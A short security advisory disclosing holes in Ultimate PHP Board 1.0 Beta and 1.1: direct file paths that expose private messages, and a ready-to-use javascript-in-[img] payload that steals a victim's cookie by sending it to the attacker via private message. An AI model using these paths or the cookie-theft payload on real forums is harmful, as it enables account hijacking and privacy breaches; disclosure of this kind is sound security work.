Security holes : Ultimate PHP Board

[frog frog <leseulfrog () hotmail com>]

Product :
Ultimate PHP Board
http://xcrew.host.sk

Versions :
1.0 Beta
1.1

Problems : 
1.0 B :
- Reading of privates messages
1.1 & 1.0 B :
- Access to users/admins accounts

Exploits :
1.0 B :
- /members/ID.pm
- /members/ID.xbb
1.1 :
- [img]javascript:window.open('
index.php?
upb=pm&mode=send&send=yes&target_id=MY-
ID&betreff=cookie&pm='+document.cookie+
'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-
ID&check=yes
')[/img]



More details in french :
http://www.ifrance.com/kitetoua/tuto/UPB.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FUPB.txt&langpair=fr%7Cen&hl=en&prev=%
2Flanguage_tools

frog-m@n